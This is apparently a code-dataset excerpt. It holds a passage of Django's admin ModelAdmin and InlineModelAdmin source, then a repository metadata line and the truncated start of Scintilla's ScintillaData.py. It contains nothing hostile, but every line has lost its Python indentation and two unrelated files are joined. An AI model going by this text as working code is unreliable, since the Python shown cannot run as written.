"""
# If the action is a callable, just use it.
if callable(action):
func = action
action = action.__name__
# Next, look for a method. Grab it off self.__class__ to get an unbound
# method instead of a bound one; this ensures that the calling
# conventions are the same for functions and methods.
elif hasattr(self.__class__, action):
func = getattr(self.__class__, action)
# Finally, look for a named method on the admin site
else:
try:
func = self.admin_site.get_action(action)
except KeyError:
return None
if hasattr(func, 'short_description'):
description = func.short_description
else:
description = capfirst(action.replace('_', ' '))
return func, action, description
def get_list_display(self, request):
"""
Return a sequence containing the fields to be displayed on the
changelist.
"""
return self.list_display
def get_list_display_links(self, request, list_display):
"""
Return a sequence containing the fields to be displayed as links
on the changelist. The list_display parameter is the list of fields
returned by get_list_display().
"""
if self.list_display_links or self.list_display_links is None or not list_display:
return self.list_display_links
else:
# Use only the first item in list_display as link
return list(list_display)[:1]
def get_list_filter(self, request):
"""
Returns a sequence containing the fields to be displayed as filters in
the right sidebar of the changelist page.
"""
return self.list_filter
def get_list_select_related(self, request):
"""
Returns a list of fields to add to the select_related() part of the
changelist items query.
"""
return self.list_select_related
def get_search_fields(self, request):
"""
Returns a sequence containing the fields to be searched whenever
somebody submits a search query.
"""
return self.search_fields
def get_search_results(self, request, queryset, search_term):
"""
Returns a tuple containing a queryset to implement the search,
and a boolean indicating if the results may contain duplicates.
"""
# Apply keyword searches.
def construct_search(field_name):
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
elif field_name.startswith('@'):
return "%s__search" % field_name[1:]
else:
return "%s__icontains" % field_name
use_distinct = False
search_fields = self.get_search_fields(request)
if search_fields and search_term:
orm_lookups = [construct_search(str(search_field))
for search_field in search_fields]
for bit in search_term.split():
or_queries = [models.Q(**{orm_lookup: bit})
for orm_lookup in orm_lookups]
queryset = queryset.filter(reduce(operator.or_, or_queries))
if not use_distinct:
for search_spec in orm_lookups:
if lookup_needs_distinct(self.opts, search_spec):
use_distinct = True
break
return queryset, use_distinct
def get_preserved_filters(self, request):
"""
Returns the preserved filters querystring.
"""
match = request.resolver_match
if self.preserve_filters and match:
opts = self.model._meta
current_url = '%s:%s' % (match.app_name, match.url_name)
changelist_url = 'admin:%s_%s_changelist' % (opts.app_label, opts.model_name)
if current_url == changelist_url:
preserved_filters = request.GET.urlencode()
else:
preserved_filters = request.GET.get('_changelist_filters')
if preserved_filters:
return urlencode({'_changelist_filters': preserved_filters})
return ''
def construct_change_message(self, request, form, formsets, add=False):
"""
Construct a change message from a changed object.
"""
change_message = []
if add:
change_message.append(_('Added.'))
elif form.changed_data:
change_message.append(_('Changed %s.') % get_text_list(form.changed_data, _('and')))
if formsets:
for formset in formsets:
for added_object in formset.new_objects:
change_message.append(_('Added %(name)s "%(object)s".')
% {'name': force_text(added_object._meta.verbose_name),
'object': force_text(added_object)})
for changed_object, changed_fields in formset.changed_objects:
change_message.append(_('Changed %(list)s for %(name)s "%(object)s".')
% {'list': get_text_list(changed_fields, _('and')),
'name': force_text(changed_object._meta.verbose_name),
'object': force_text(changed_object)})
for deleted_object in formset.deleted_objects:
change_message.append(_('Deleted %(name)s "%(object)s".')
% {'name': force_text(deleted_object._meta.verbose_name),
'object': force_text(deleted_object)})
change_message = ' '.join(change_message)
return change_message or _('No fields changed.')
def message_user(self, request, message, level=messages.INFO, extra_tags='',
fail_silently=False):
"""
Send a message to the user. The default implementation
posts a message using the django.contrib.messages backend.
Exposes almost the same API as messages.add_message(), but accepts the
positional arguments in a different order to maintain backwards
compatibility. For convenience, it accepts the `level` argument as
a string rather than the usual level number.
"""
if not isinstance(level, int):
# attempt to get the level if passed a string
try:
level = getattr(messages.constants, level.upper())
except AttributeError:
levels = messages.constants.DEFAULT_TAGS.values()
levels_repr = ', '.join('`%s`' % l for l in levels)
raise ValueError('Bad message level string: `%s`. '
'Possible values are: %s' % (level, levels_repr))
messages.add_message(request, level, message, extra_tags=extra_tags,
fail_silently=fail_silently)
def save_form(self, request, form, change):
"""
Given a ModelForm return an unsaved instance. ``change`` is True if
the object is being changed, and False if it's being added.
"""
return form.save(commit=False)
def save_model(self, request, obj, form, change):
"""
Given a model instance save it to the database.
"""
obj.save()
def delete_model(self, request, obj):
"""
Given a model instance delete it from the database.
"""
obj.delete()
def save_formset(self, request, form, formset, change):
"""
Given an inline formset save it to the database.
"""
formset.save()
def save_related(self, request, form, formsets, change):
"""
Given the ``HttpRequest``, the parent ``ModelForm`` instance, the
list of inline formsets and a boolean value based on whether the
parent is being added or changed, save the related objects to the
database. Note that at this point save_form() and save_model() have
already been called.
"""
form.save_m2m()
for formset in formsets:
self.save_formset(request, form, formset, change=change)
def render_change_form(self, request, context, add=False, change=False, form_url='', obj=None):
opts = self.model._meta
app_label = opts.app_label
preserved_filters = self.get_preserved_filters(request)
form_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, form_url)
view_on_site_url = self.get_view_on_site_url(obj)
context.update({
'add': add,
'change': change,
'has_add_permission': self.has_add_permission(request),
'has_change_permission': self.has_change_permission(request, obj),
'has_delete_permission': self.has_delete_permission(request, obj),
'has_file_field': True, # FIXME - this should check if form or formsets have a FileField,
'has_absolute_url': view_on_site_url is not None,
'absolute_url': view_on_site_url,
'form_url': form_url,
'opts': opts,
'content_type_id': get_content_type_for_model(self.model).pk,
'save_as': self.save_as,
'save_on_top': self.save_on_top,
'to_field_var': TO_FIELD_VAR,
'is_popup_var': IS_POPUP_VAR,
'app_label': app_label,
})
if add and self.add_form_template is not None:
form_template = self.add_form_template
else:
form_template = self.change_form_template
request.current_app = self.admin_site.name
return TemplateResponse(request, form_template or [
"admin/%s/%s/change_form.html" % (app_label, opts.model_name),
"admin/%s/change_form.html" % app_label,
"admin/change_form.html"
], context)
def response_add(self, request, obj, post_url_continue=None):
"""
Determines the HttpResponse for the add_view stage.
"""
opts = obj._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {'name': force_text(opts.verbose_name), 'obj': force_text(obj)}
# Here, we distinguish between different save types by checking for
# the presence of keys in request.POST.
if IS_POPUP_VAR in request.POST:
to_field = request.POST.get(TO_FIELD_VAR)
if to_field:
attr = str(to_field)
else:
attr = obj._meta.pk.attname
value = obj.serializable_value(attr)
return SimpleTemplateResponse('admin/popup_response.html', {
'value': value,
'obj': obj,
})
elif "_continue" in request.POST:
msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
if post_url_continue is None:
post_url_continue = reverse('admin:%s_%s_change' %
(opts.app_label, opts.model_name),
args=(quote(pk_value),),
current_app=self.admin_site.name)
post_url_continue = add_preserved_filters(
{'preserved_filters': preserved_filters, 'opts': opts},
post_url_continue
)
return HttpResponseRedirect(post_url_continue)
elif "_addanother" in request.POST:
msg = _('The %(name)s "%(obj)s" was added successfully. You may add another %(name)s below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.path
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
else:
msg = _('The %(name)s "%(obj)s" was added successfully.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
return self.response_post_save_add(request, obj)
def response_change(self, request, obj):
"""
Determines the HttpResponse for the change_view stage.
"""
if IS_POPUP_VAR in request.POST:
to_field = request.POST.get(TO_FIELD_VAR)
attr = str(to_field) if to_field else obj._meta.pk.attname
# Retrieve the `object_id` from the resolved pattern arguments.
value = request.resolver_match.args[0]
new_value = obj.serializable_value(attr)
return SimpleTemplateResponse('admin/popup_response.html', {
'action': 'change',
'value': escape(value),
'obj': escapejs(obj),
'new_value': escape(new_value),
})
opts = self.model._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {'name': force_text(opts.verbose_name), 'obj': force_text(obj)}
if "_continue" in request.POST:
msg = _('The %(name)s "%(obj)s" was changed successfully. You may edit it again below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.path
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
elif "_saveasnew" in request.POST:
msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = reverse('admin:%s_%s_change' %
(opts.app_label, opts.model_name),
args=(pk_value,),
current_app=self.admin_site.name)
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
elif "_addanother" in request.POST:
msg = _('The %(name)s "%(obj)s" was changed successfully. You may add another %(name)s below.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
redirect_url = reverse('admin:%s_%s_add' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
redirect_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
else:
msg = _('The %(name)s "%(obj)s" was changed successfully.') % msg_dict
self.message_user(request, msg, messages.SUCCESS)
return self.response_post_save_change(request, obj)
def response_post_save_add(self, request, obj):
"""
Figure out where to redirect after the 'Save' button has been pressed
when adding a new object.
"""
opts = self.model._meta
if self.has_change_permission(request, None):
post_url = reverse('admin:%s_%s_changelist' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
preserved_filters = self.get_preserved_filters(request)
post_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, post_url)
else:
post_url = reverse('admin:index',
current_app=self.admin_site.name)
return HttpResponseRedirect(post_url)
def response_post_save_change(self, request, obj):
"""
Figure out where to redirect after the 'Save' button has been pressed
when editing an existing object.
"""
opts = self.model._meta
if self.has_change_permission(request, None):
post_url = reverse('admin:%s_%s_changelist' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
preserved_filters = self.get_preserved_filters(request)
post_url = add_preserved_filters({'preserved_filters': preserved_filters, 'opts': opts}, post_url)
else:
post_url = reverse('admin:index',
current_app=self.admin_site.name)
return HttpResponseRedirect(post_url)
def response_action(self, request, queryset):
"""
Handle an admin action. This is called if a request is POSTed to the
changelist; it returns an HttpResponse if the action was handled, and
None otherwise.
"""
# There can be multiple action forms on the page (at the top
# and bottom of the change list, for example). Get the action
# whose button was pushed.
try:
action_index = int(request.POST.get('index', 0))
except ValueError:
action_index = 0
# Construct the action form.
data = request.POST.copy()
data.pop(helpers.ACTION_CHECKBOX_NAME, None)
data.pop("index", None)
# Use the action whose button was pushed
try:
data.update({'action': data.getlist('action')[action_index]})
except IndexError:
# If we didn't get an action from the chosen form that's invalid
# POST data, so by deleting action it'll fail the validation check
# below. So no need to do anything here
pass
action_form = self.action_form(data, auto_id=None)
action_form.fields['action'].choices = self.get_action_choices(request)
# If the form's valid we can handle the action.
if action_form.is_valid():
action = action_form.cleaned_data['action']
select_across = action_form.cleaned_data['select_across']
func = self.get_actions(request)[action][0]
# Get the list of selected PKs. If nothing's selected, we can't
# perform an action on it, so bail. Except we want to perform
# the action explicitly on all objects.
selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME)
if not selected and not select_across:
# Reminder that something needs to be selected or nothing will happen
msg = _("Items must be selected in order to perform "
"actions on them. No items have been changed.")
self.message_user(request, msg, messages.WARNING)
return None
if not select_across:
# Perform the action only on the selected objects
queryset = queryset.filter(pk__in=selected)
response = func(self, request, queryset)
# Actions may return an HttpResponse-like object, which will be
# used as the response from the POST. If not, we'll be a good
# little HTTP citizen and redirect back to the changelist page.
if isinstance(response, HttpResponseBase):
return response
else:
return HttpResponseRedirect(request.get_full_path())
else:
msg = _("No action selected.")
self.message_user(request, msg, messages.WARNING)
return None
def response_delete(self, request, obj_display, obj_id):
"""
Determines the HttpResponse for the delete_view stage.
"""
opts = self.model._meta
if IS_POPUP_VAR in request.POST:
return SimpleTemplateResponse('admin/popup_response.html', {
'action': 'delete',
'value': escape(obj_id),
})
self.message_user(request,
_('The %(name)s "%(obj)s" was deleted successfully.') % {
'name': force_text(opts.verbose_name),
'obj': force_text(obj_display),
}, messages.SUCCESS)
if self.has_change_permission(request, None):
post_url = reverse('admin:%s_%s_changelist' %
(opts.app_label, opts.model_name),
current_app=self.admin_site.name)
preserved_filters = self.get_preserved_filters(request)
post_url = add_preserved_filters(
{'preserved_filters': preserved_filters, 'opts': opts}, post_url
)
else:
post_url = reverse('admin:index',
current_app=self.admin_site.name)
return HttpResponseRedirect(post_url)
def render_delete_form(self, request, context):
opts = self.model._meta
app_label = opts.app_label
request.current_app = self.admin_site.name
context.update(
to_field_var=TO_FIELD_VAR,
is_popup_var=IS_POPUP_VAR,
)
return TemplateResponse(request,
self.delete_confirmation_template or [
"admin/{}/{}/delete_confirmation.html".format(app_label, opts.model_name),
"admin/{}/delete_confirmation.html".format(app_label),
"admin/delete_confirmation.html"
], context)
def get_inline_formsets(self, request, formsets, inline_instances,
obj=None):
inline_admin_formsets = []
for inline, formset in zip(inline_instances, formsets):
fieldsets = list(inline.get_fieldsets(request, obj))
readonly = list(inline.get_readonly_fields(request, obj))
prepopulated = dict(inline.get_prepopulated_fields(request, obj))
inline_admin_formset = helpers.InlineAdminFormSet(inline, formset,
fieldsets, prepopulated, readonly, model_admin=self)
inline_admin_formsets.append(inline_admin_formset)
return inline_admin_formsets
def get_changeform_initial_data(self, request):
"""
Get the initial form data.
Unless overridden, this populates from the GET params.
"""
initial = dict(request.GET.items())
for k in initial:
try:
f = self.model._meta.get_field(k)
except FieldDoesNotExist:
continue
# We have to special-case M2Ms as a list of comma-separated PKs.
if isinstance(f, models.ManyToManyField):
initial[k] = initial[k].split(",")
return initial
@csrf_protect_m
@transaction.atomic
def changeform_view(self, request, object_id=None, form_url='', extra_context=None):
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
model = self.model
opts = model._meta
add = object_id is None
if add:
if not self.has_add_permission(request):
raise PermissionDenied
obj = None
else:
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_change_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(opts.verbose_name), 'key': escape(object_id)})
if request.method == 'POST' and "_saveasnew" in request.POST:
object_id = None
obj = None
ModelForm = self.get_form(request, obj)
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES, instance=obj)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=not add)
else:
form_validated = False
new_object = form.instance
formsets, inline_instances = self._create_formsets(request, new_object, change=not add)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, not add)
self.save_related(request, form, formsets, not add)
change_message = self.construct_change_message(request, form, formsets, add)
if add:
self.log_addition(request, new_object, change_message)
return self.response_add(request, new_object)
else:
self.log_change(request, new_object, change_message)
return self.response_change(request, new_object)
else:
form_validated = False
else:
if add:
initial = self.get_changeform_initial_data(request)
form = ModelForm(initial=initial)
formsets, inline_instances = self._create_formsets(request, form.instance, change=False)
else:
form = ModelForm(instance=obj)
formsets, inline_instances = self._create_formsets(request, obj, change=True)
adminForm = helpers.AdminForm(
form,
list(self.get_fieldsets(request, obj)),
self.get_prepopulated_fields(request, obj),
self.get_readonly_fields(request, obj),
model_admin=self)
media = self.media + adminForm.media
inline_formsets = self.get_inline_formsets(request, formsets, inline_instances, obj)
for inline_formset in inline_formsets:
media = media + inline_formset.media
context = dict(self.admin_site.each_context(request),
title=(_('Add %s') if add else _('Change %s')) % force_text(opts.verbose_name),
adminform=adminForm,
object_id=object_id,
original=obj,
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
media=media,
inline_admin_formsets=inline_formsets,
errors=helpers.AdminErrorList(form, formsets),
preserved_filters=self.get_preserved_filters(request),
)
# Hide the "Save" and "Save and continue" buttons if "Save as New" was
# previously chosen to prevent the interface from getting confusing.
if request.method == 'POST' and not form_validated and "_saveasnew" in request.POST:
context['show_save'] = False
context['show_save_and_continue'] = False
context.update(extra_context or {})
return self.render_change_form(request, context, add=add, change=not add, obj=obj, form_url=form_url)
def add_view(self, request, form_url='', extra_context=None):
return self.changeform_view(request, None, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
return self.changeform_view(request, object_id, form_url, extra_context)
@csrf_protect_m
def changelist_view(self, request, extra_context=None):
"""
The 'change list' admin view for this model.
"""
from django.contrib.admin.views.main import ERROR_FLAG
opts = self.model._meta
app_label = opts.app_label
if not self.has_change_permission(request, None):
raise PermissionDenied
list_display = self.get_list_display(request)
list_display_links = self.get_list_display_links(request, list_display)
list_filter = self.get_list_filter(request)
search_fields = self.get_search_fields(request)
list_select_related = self.get_list_select_related(request)
# Check actions to see if any are available on this changelist
actions = self.get_actions(request)
if actions:
# Add the action checkboxes if there are any actions available.
list_display = ['action_checkbox'] + list(list_display)
ChangeList = self.get_changelist(request)
try:
cl = ChangeList(request, self.model, list_display,
list_display_links, list_filter, self.date_hierarchy,
search_fields, list_select_related, self.list_per_page,
self.list_max_show_all, self.list_editable, self)
except IncorrectLookupParameters:
# Wacky lookup parameters were given, so redirect to the main
# changelist page, without parameters, and pass an 'invalid=1'
# parameter via the query string. If wacky parameters were given
# and the 'invalid=1' parameter was already in the query string,
# something is screwed up with the database, so display an error
# page.
if ERROR_FLAG in request.GET.keys():
return SimpleTemplateResponse('admin/invalid_setup.html', {
'title': _('Database error'),
})
return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')
# If the request was POSTed, this might be a bulk action or a bulk
# edit. Try to look up an action or confirmation first, but if this
# isn't an action the POST will fall through to the bulk edit check,
# below.
action_failed = False
selected = request.POST.getlist(helpers.ACTION_CHECKBOX_NAME)
# Actions with no confirmation
if (actions and request.method == 'POST' and
'index' in request.POST and '_save' not in request.POST):
if selected:
response = self.response_action(request, queryset=cl.get_queryset(request))
if response:
return response
else:
action_failed = True
else:
msg = _("Items must be selected in order to perform "
"actions on them. No items have been changed.")
self.message_user(request, msg, messages.WARNING)
action_failed = True
# Actions with confirmation
if (actions and request.method == 'POST' and
helpers.ACTION_CHECKBOX_NAME in request.POST and
'index' not in request.POST and '_save' not in request.POST):
if selected:
response = self.response_action(request, queryset=cl.get_queryset(request))
if response:
return response
else:
action_failed = True
# If we're allowing changelist editing, we need to construct a formset
# for the changelist given all the fields to be edited. Then we'll
# use the formset to validate/process POSTed data.
formset = cl.formset = None
# Handle POSTed bulk-edit data.
if (request.method == "POST" and cl.list_editable and
'_save' in request.POST and not action_failed):
FormSet = self.get_changelist_formset(request)
formset = cl.formset = FormSet(request.POST, request.FILES, queryset=cl.result_list)
if formset.is_valid():
changecount = 0
for form in formset.forms:
if form.has_changed():
obj = self.save_form(request, form, change=True)
self.save_model(request, obj, form, change=True)
self.save_related(request, form, formsets=[], change=True)
change_msg = self.construct_change_message(request, form, None)
self.log_change(request, obj, change_msg)
changecount += 1
if changecount:
if changecount == 1:
name = force_text(opts.verbose_name)
else:
name = force_text(opts.verbose_name_plural)
msg = ungettext("%(count)s %(name)s was changed successfully.",
"%(count)s %(name)s were changed successfully.",
changecount) % {'count': changecount,
'name': name,
'obj': force_text(obj)}
self.message_user(request, msg, messages.SUCCESS)
return HttpResponseRedirect(request.get_full_path())
# Handle GET -- construct a formset for display.
elif cl.list_editable:
FormSet = self.get_changelist_formset(request)
formset = cl.formset = FormSet(queryset=cl.result_list)
# Build the list of media to be used by the formset.
if formset:
media = self.media + formset.media
else:
media = self.media
# Build the action form and populate it with available actions.
if actions:
action_form = self.action_form(auto_id=None)
action_form.fields['action'].choices = self.get_action_choices(request)
else:
action_form = None
selection_note_all = ungettext('%(total_count)s selected',
'All %(total_count)s selected', cl.result_count)
context = dict(
self.admin_site.each_context(request),
module_name=force_text(opts.verbose_name_plural),
selection_note=_('0 of %(cnt)s selected') % {'cnt': len(cl.result_list)},
selection_note_all=selection_note_all % {'total_count': cl.result_count},
title=cl.title,
is_popup=cl.is_popup,
to_field=cl.to_field,
cl=cl,
media=media,
has_add_permission=self.has_add_permission(request),
opts=cl.opts,
action_form=action_form,
actions_on_top=self.actions_on_top,
actions_on_bottom=self.actions_on_bottom,
actions_selection_counter=self.actions_selection_counter,
preserved_filters=self.get_preserved_filters(request),
)
context.update(extra_context or {})
request.current_app = self.admin_site.name
return TemplateResponse(request, self.change_list_template or [
'admin/%s/%s/change_list.html' % (app_label, opts.model_name),
'admin/%s/change_list.html' % app_label,
'admin/change_list.html'
], context)
@csrf_protect_m
@transaction.atomic
def delete_view(self, request, object_id, extra_context=None):
"The 'delete' admin view for this model."
opts = self.model._meta
app_label = opts.app_label
to_field = request.POST.get(TO_FIELD_VAR, request.GET.get(TO_FIELD_VAR))
if to_field and not self.to_field_allowed(request, to_field):
raise DisallowedModelAdminToField("The field %s cannot be referenced." % to_field)
obj = self.get_object(request, unquote(object_id), to_field)
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(
_('%(name)s object with primary key %(key)r does not exist.') %
{'name': force_text(opts.verbose_name), 'key': escape(object_id)}
)
using = router.db_for_write(self.model)
# Populate deleted_objects, a data structure of all related objects that
# will also be deleted.
(deleted_objects, model_count, perms_needed, protected) = get_deleted_objects(
[obj], opts, request.user, self.admin_site, using)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied
obj_display = force_text(obj)
attr = str(to_field) if to_field else opts.pk.attname
obj_id = obj.serializable_value(attr)
self.log_deletion(request, obj, obj_display)
self.delete_model(request, obj)
return self.response_delete(request, obj_display, obj_id)
object_name = force_text(opts.verbose_name)
if perms_needed or protected:
title = _("Cannot delete %(name)s") % {"name": object_name}
else:
title = _("Are you sure?")
context = dict(
self.admin_site.each_context(request),
title=title,
object_name=object_name,
object=obj,
deleted_objects=deleted_objects,
model_count=dict(model_count).items(),
perms_lacking=perms_needed,
protected=protected,
opts=opts,
app_label=app_label,
preserved_filters=self.get_preserved_filters(request),
is_popup=(IS_POPUP_VAR in request.POST or
IS_POPUP_VAR in request.GET),
to_field=to_field,
)
context.update(extra_context or {})
return self.render_delete_form(request, context)
def history_view(self, request, object_id, extra_context=None):
"The 'history' admin view for this model."
from django.contrib.admin.models import LogEntry
# First check if the user can see this history.
model = self.model
obj = self.get_object(request, unquote(object_id))
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {
'name': force_text(model._meta.verbose_name),
'key': escape(object_id),
})
if not self.has_change_permission(request, obj):
raise PermissionDenied
# Then get the history for this object.
opts = model._meta
app_label = opts.app_label
action_list = LogEntry.objects.filter(
object_id=unquote(object_id),
content_type=get_content_type_for_model(model)
).select_related().order_by('action_time')
context = dict(self.admin_site.each_context(request),
title=_('Change history: %s') % force_text(obj),
action_list=action_list,
module_name=capfirst(force_text(opts.verbose_name_plural)),
object=obj,
opts=opts,
preserved_filters=self.get_preserved_filters(request),
)
context.update(extra_context or {})
request.current_app = self.admin_site.name
return TemplateResponse(request, self.object_history_template or [
"admin/%s/%s/object_history.html" % (app_label, opts.model_name),
"admin/%s/object_history.html" % app_label,
"admin/object_history.html"
], context)
def _create_formsets(self, request, obj, change):
"Helper function to generate formsets for add/change_view."
formsets = []
inline_instances = []
prefixes = {}
get_formsets_args = [request]
if change:
get_formsets_args.append(obj)
for FormSet, inline in self.get_formsets_with_inlines(*get_formsets_args):
prefix = FormSet.get_default_prefix()
prefixes[prefix] = prefixes.get(prefix, 0) + 1
if prefixes[prefix] != 1 or not prefix:
prefix = "%s-%s" % (prefix, prefixes[prefix])
formset_params = {
'instance': obj,
'prefix': prefix,
'queryset': inline.get_queryset(request),
}
if request.method == 'POST':
formset_params.update({
'data': request.POST,
'files': request.FILES,
'save_as_new': '_saveasnew' in request.POST
})
formsets.append(FormSet(**formset_params))
inline_instances.append(inline)
return formsets, inline_instances
class InlineModelAdmin(BaseModelAdmin):
"""
Options for inline editing of ``model`` instances.
Provide ``fk_name`` to specify the attribute name of the ``ForeignKey``
from ``model`` to its parent. This is required if ``model`` has more than
one ``ForeignKey`` to its parent.
"""
model = None
fk_name = None
formset = BaseInlineFormSet
extra = 3
min_num = None
max_num = None
template = None
verbose_name = None
verbose_name_plural = None
can_delete = True
show_change_link = False
checks_class = InlineModelAdminChecks
def __init__(self, parent_model, admin_site):
self.admin_site = admin_site
self.parent_model = parent_model
self.opts = self.model._meta
self.has_registered_model = admin_site.is_registered(self.model)
super(InlineModelAdmin, self).__init__()
if self.verbose_name is None:
self.verbose_name = self.model._meta.verbose_name
if self.verbose_name_plural is None:
self.verbose_name_plural = self.model._meta.verbose_name_plural
@property
def media(self):
extra = '' if settings.DEBUG else '.min'
js = ['vendor/jquery/jquery%s.js' % extra, 'jquery.init.js',
'inlines%s.js' % extra]
if self.filter_vertical or self.filter_horizontal:
js.extend(['SelectBox.js', 'SelectFilter2.js'])
return forms.Media(js=[static('admin/js/%s' % url) for url in js])
def get_extra(self, request, obj=None, **kwargs):
"""Hook for customizing the number of extra inline forms."""
return self.extra
def get_min_num(self, request, obj=None, **kwargs):
"""Hook for customizing the min number of inline forms."""
return self.min_num
def get_max_num(self, request, obj=None, **kwargs):
"""Hook for customizing the max number of extra inline forms."""
return self.max_num
def get_formset(self, request, obj=None, **kwargs):
"""Returns a BaseInlineFormSet class for use in admin add/change views."""
if 'fields' in kwargs:
fields = kwargs.pop('fields')
else:
fields = flatten_fieldsets(self.get_fieldsets(request, obj))
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
exclude.extend(self.get_readonly_fields(request, obj))
if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
# Take the custom ModelForm's Meta.exclude into account only if the
# InlineModelAdmin doesn't define its own.
exclude.extend(self.form._meta.exclude)
# If exclude is an empty list we use None, since that's the actual
# default.
exclude = exclude or None
can_delete = self.can_delete and self.has_delete_permission(request, obj)
defaults = {
"form": self.form,
"formset": self.formset,
"fk_name": self.fk_name,
"fields": fields,
"exclude": exclude,
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
"extra": self.get_extra(request, obj, **kwargs),
"min_num": self.get_min_num(request, obj, **kwargs),
"max_num": self.get_max_num(request, obj, **kwargs),
"can_delete": can_delete,
}
defaults.update(kwargs)
base_model_form = defaults['form']
class DeleteProtectedModelForm(base_model_form):
def hand_clean_DELETE(self):
"""
We don't validate the 'DELETE' field itself because on
templates it's not rendered using the field information, but
just using a generic "deletion_field" of the InlineModelAdmin.
"""
if self.cleaned_data.get(DELETION_FIELD_NAME, False):
using = router.db_for_write(self._meta.model)
collector = NestedObjects(using=using)
if self.instance.pk is None:
return
collector.collect([self.instance])
if collector.protected:
objs = []
for p in collector.protected:
objs.append(
# Translators: Model verbose name and instance representation,
# suitable to be an item in a list.
_('%(class_name)s %(instance)s') % {
'class_name': p._meta.verbose_name,
'instance': p}
)
params = {'class_name': self._meta.model._meta.verbose_name,
'instance': self.instance,
'related_objects': get_text_list(objs, _('and'))}
msg = _("Deleting %(class_name)s %(instance)s would require "
"deleting the following protected related objects: "
"%(related_objects)s")
raise ValidationError(msg, code='deleting_protected', params=params)
def is_valid(self):
result = super(DeleteProtectedModelForm, self).is_valid()
self.hand_clean_DELETE()
return result
defaults['form'] = DeleteProtectedModelForm
if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
defaults['fields'] = forms.ALL_FIELDS
return inlineformset_factory(self.parent_model, self.model, **defaults)
def get_fields(self, request, obj=None):
if self.fields:
return self.fields
form = self.get_formset(request, obj, fields=None).form
return list(form.base_fields) + list(self.get_readonly_fields(request, obj))
def get_queryset(self, request):
queryset = super(InlineModelAdmin, self).get_queryset(request)
if not self.has_change_permission(request):
queryset = queryset.none()
return queryset
def has_add_permission(self, request):
if self.opts.auto_created:
# We're checking the rights to an auto-created intermediate model,
# which doesn't have its own individual permissions. The user needs
# to have the change permission for the related model in order to
# be able to do anything with the intermediate model.
return self.has_change_permission(request)
return super(InlineModelAdmin, self).has_add_permission(request)
def has_change_permission(self, request, obj=None):
opts = self.opts
if opts.auto_created:
# The model was auto-created as intermediary for a
# ManyToMany-relationship, find the target model
for field in opts.fields:
if field.remote_field and field.remote_field.model != self.parent_model:
opts = field.remote_field.model._meta
break
codename = get_permission_codename('change', opts)
return request.user.has_perm("%s.%s" % (opts.app_label, codename))
def has_delete_permission(self, request, obj=None):
if self.opts.auto_created:
# We're checking the rights to an auto-created intermediate model,
# which doesn't have its own individual permissions. The user needs
# to have the change permission for the related model in order to
# be able to do anything with the intermediate model.
return self.has_change_permission(request, obj)
return super(InlineModelAdmin, self).has_delete_permission(request, obj)
class StackedInline(InlineModelAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularInline(InlineModelAdmin):
template = 'admin/edit_inline/tabular.html'
| bsd-3-clause |
ppriest/mame | 3rdparty/bgfx/3rdparty/scintilla/scripts/ScintillaData.py | 69 | 8599 | # ScintillaData.py - implemented 2013 by Neil Hodgson [email protected]
# Released to the public domain.
# Common code used by Scintilla and SciTE for source file regeneration.
# The ScintillaData object exposes information about Scintilla as properties:
# Version properties
# version
# versionDotted
# versionCommad
#
# Date last modified
# dateModified
# yearModified
# mdyModified
# dmyModified
# myModified
#
# Information about lexers and properties defined in lexers
# lexFiles
# sorted list of lexer files
# lexerModules
# sorted list of module names
# lexerProperties
# sorted list of lexer properties
# propertyDocuments
# dictionary of property documentation { name: document string }
# This file can be run to see the data it provides.
# Requires Python 2.5 or later
from __future__ import with_statement
import codecs, datetime, glob, os, sys, textwrap
import FileGenerator
def FindModules(lexFile):
modules = []
with open(lexFile) as f:
for l in f.readlines():
if l.startswith("LexerModule"):
l = l.replace("(", " ")
